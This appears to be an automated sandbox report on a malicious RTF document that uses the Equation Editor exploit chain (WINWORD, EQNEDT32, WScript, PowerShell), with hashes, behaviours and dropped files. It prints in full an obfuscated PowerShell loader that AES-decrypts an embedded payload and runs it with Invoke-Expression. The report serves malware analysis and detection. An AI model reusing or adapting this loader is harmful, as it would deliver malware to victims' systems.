Analysis
-
max time kernel
100s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
19-07-2024 07:03
Static task
static1
Behavioral task
behavioral1
Sample
e677d8183d89a410a3ce59db5a2722d3.rtf
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
e677d8183d89a410a3ce59db5a2722d3.rtf
Resource
win10v2004-20240709-en
General
-
Target
e677d8183d89a410a3ce59db5a2722d3.rtf
-
Size
90KB
-
MD5
e677d8183d89a410a3ce59db5a2722d3
-
SHA1
969255020b8e5b9cf16ffa6dd7c8f931e7b68ce7
-
SHA256
5705cdd93bd849acc4bfc1a9a2fa9b4c6f9e4b1dd1dbd43b0e8b35c32519d6d2
-
SHA512
8f7369c3de05953613c246a1312a6ccfb6c416e458ddd55efdfb96c0ef569832aea51a52527fbfd5f7c36e1613c59358c425e5d8cdbf51d5bf4fb63a2bc16cc5
-
SSDEEP
384:Vgn/TJl/8FdlK+gqigv0C7xAlEM5jUbTMbyi9thdIhFRi2mnk0PKk6Ut6jvWdlKv:YuF22+iM5jZbyShdIjFJu2
Malware Config
Signatures
-
Blocklisted process makes network request 7 IoCs
Processes:
EQNEDT32.EXEWScript.exepowershell.exeflow pid process 3 2548 EQNEDT32.EXE 7 2816 WScript.exe 9 2816 WScript.exe 11 600 powershell.exe 12 600 powershell.exe 13 600 powershell.exe 14 600 powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2220 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 600 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 600 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 2220 WINWORD.EXE 2220 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
EQNEDT32.EXEWScript.exeWINWORD.EXEdescription pid process target process PID 2548 wrote to memory of 2816 2548 EQNEDT32.EXE WScript.exe PID 2548 wrote to memory of 2816 2548 EQNEDT32.EXE WScript.exe PID 2548 wrote to memory of 2816 2548 EQNEDT32.EXE WScript.exe PID 2548 wrote to memory of 2816 2548 EQNEDT32.EXE WScript.exe PID 2816 wrote to memory of 600 2816 WScript.exe powershell.exe PID 2816 wrote to memory of 600 2816 WScript.exe powershell.exe PID 2816 wrote to memory of 600 2816 WScript.exe powershell.exe PID 2816 wrote to memory of 600 2816 WScript.exe powershell.exe PID 2220 wrote to memory of 1644 2220 WINWORD.EXE splwow64.exe PID 2220 wrote to memory of 1644 2220 WINWORD.EXE splwow64.exe PID 2220 wrote to memory of 1644 2220 WINWORD.EXE splwow64.exe PID 2220 wrote to memory of 1644 2220 WINWORD.EXE splwow64.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e677d8183d89a410a3ce59db5a2722d3.rtf"1⤵
- Drops file in Windows directory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\butterburnverysweetgirleate.vBS"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI49958097433743076509724959814142CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIbxuRBZW58D6qHa6OaTz/wPo2erEU3a8XHWrkXAdbdzTC5T84fuiWq58k3i/POU4yNFit1HabT7Ip/uUGVBt4z8Uo7htAUUgjHEN/nsapjY6CPUspvGVUGHssU+Pr5nnVpAZRUrtIGtx098n/onUN4/9UdxjeWta56320IcuEKx5FBRF8BN5agrfzcPl8nWFJaCYbxALQD0pd8wcDcG7Z4qp//WpU8YzhhoHcmfr6tHPpzTEfbrZwiVOvuw+/JvzsrMeYk7zZu+UUshFBQ5tqcmHnYcNcKNeVyySh7vbF4dtVBPC59rcDf45Ip8e8qgnf+f59F72C6X8w7BKmWcxDrvkgIJEdDAL8hj2Jkhtpz0sR4L4aVrWtEQPJ8yxgXf1T2rm+XpdfVfU+ukTx19Jz3wEIAgQSafjf0GfBAL3e4NWDVLet9944vxSiJB8xEd7JenGiyEOtI3Y3hprPXCw66eWQhoF3a145gY3Z2R4BogKZJ5gqp0EKkBqBT9JxAuN4bfZO+TSndIjmga9njg4/qNNYfeYV/uMRKhd+jYkkLNLrx6xGX9qi7fRuFbBprznkr12YuC7yJFQ2x0WsaX8X99Ti2tR/xVNE4EhJ7YWvD7ep2zjQ2woL0IBVZZWRC5I63PpIH400MNDUg8N135wf5JXMORFTBbnzE6SBNiXK6moSaSigUyIRhCN3MyxeECsYo51cbZ/6yqA6VLl9UwtSXFZkT6jsXN4VfMfanH4oR0pi+fnhBmdC+kor0H1eu3doM8tnX5jwkbA3g5RpVHVTwpCCiK/Odz2S8a2CmmJm46STR0hWNzn3oQo1Kld1xQ+1H8hCRSAJvVgqx0wbyv5ng74HSF/sOKduVg5TOulc0bAM2XZNa3NBd2k22BRcCPbE8qhywR0mDi7halZQFXAg8MkRAO0IpVULqcOhikrF+vgmdDw5nxwkSQghmqNulszxeC3Zk9uOC9fO9U2Om796d5NxN0o1Pe2Q7NqhzvPLHu7e5uzSTM6IOxVwRS1jI2X4kkSFKPx5pphUxpLEKB7kQwodoqK5/vSNq9DQIjN4kBA2oWI4BLdmL0+z+59rwTBW487/tVZMEyOa07ecYQeUh66aUseTs5+7zOjmEKrPtKQvkMDJnbAJKX385iV8MzoKGDBarEeSHT3Juol3DEq2A8RWkZdNDTL9gnFsG8rzPUewwTYqHynUuMh5CvZ/ZY0xv/HckoVxNKNGiY5Lzzih8SGOjMqMrXQPiaM+gvZbG3wf2VQkwyAEOH5p54L4m5O5omGT+jAdZzINuqShbK3l0wnwvp/1xtT8MQUezvxMnbqY70jjYLzsmxU+mqfUDhefKjgph7AlvQ909Z5XJmZnneYUGHW/2eWRp9MDZ+jWBNcUhGoUshHAdJ9QTrZSjBiXRG6ahqVSqrmyPd9m1isTmsd2uwpnR/Vv3sDR0Rpa6wRvf3FwwoHMJu7X9zC+Tub3ZCRtEYLoN5hNYt4Ci5ibCNjKAfPWHRBkhpXGJ4vxdNdesz33k4eAkMZFnBRlmUTdq+SY9gKxwq+9Pt2oCH8n9g9JSH93H57AAoPSteAmN+kM8YADHtLsjfKI1n/gboID0K3ci8Im+jLfaq/isIkAQtaFeepycXL9kn3HexD3NbJAn6fY0OQ8fIAKm2bi+W0vdvcXgrjypy+pLfd9B7bUz22aDOxkoZTFdRt1nVGbdgC2CCcFMLqM+ONKbDKmg2i1b2PUwPHKEMYrCPj33PxTJx0uYF6FcTqZWr1FunIOIXGkRF6YnlxA91J0qtZED4hJCnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0E1IWGZ4\paste1[1].txtFilesize
156B
MD5ad6c37ef980373e9bcbd14810fad34bc
SHA19c061a1b3608b7c7f1db7cd06c8246913ee11bda
SHA256ee85057c1a562fc405d03b2b6a651612ac688dff5c9eeae88a0c1e34e17c602c
SHA51230dc26060efcb4fd44be2d74cc4d33654ee0eb9039bd933c80b67afcc938bdba458cfa6bfc43d2ddb2f59dd6f9ddfe66951c56c61709a2dc02eac94e0e2ae97f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotmFilesize
19KB
MD5738d5c97694a93b817cb45a8e6e20264
SHA1471751e0f3c5841ec2b01dec13883c269f6530b3
SHA256cb0930eadf347431ceb1d357b9a9736932106e8031185532860bf836b6d5074e
SHA5122487aa8e595ab153c229c8fcbce531a8639d4054136a1a543a2983804ef2a004e0301ac7af15e1a8b6aa85568174073abbb1a2ec0a2a6310fe851da0266e2273
-
C:\Users\Admin\AppData\Roaming\butterburnverysweetgirleate.vBSFilesize
123KB
MD5612b79418bc9dee5e9bf503df55a245c
SHA18211185d8e6f152a269325a6cb30c361fcbb60b3
SHA256154365daa42baad94fe2c6de17859212e407767de8f9e8e12c69b9623b63a7a0
SHA51205ef1aebdd3b9f2255f7d198c18d498e5b021f89444a8679a84fc6d01e61720e1af7216444231aff52ea3811fb12715f1ac556dd7347346f9a2c12eb27a5fb02
-
memory/2220-0-0x000000002F991000-0x000000002F992000-memory.dmpFilesize
4KB
-
memory/2220-1-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2220-2-0x000000007118D000-0x0000000071198000-memory.dmpFilesize
44KB
-
memory/2220-39-0x000000007118D000-0x0000000071198000-memory.dmpFilesize
44KB
-
memory/2220-57-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB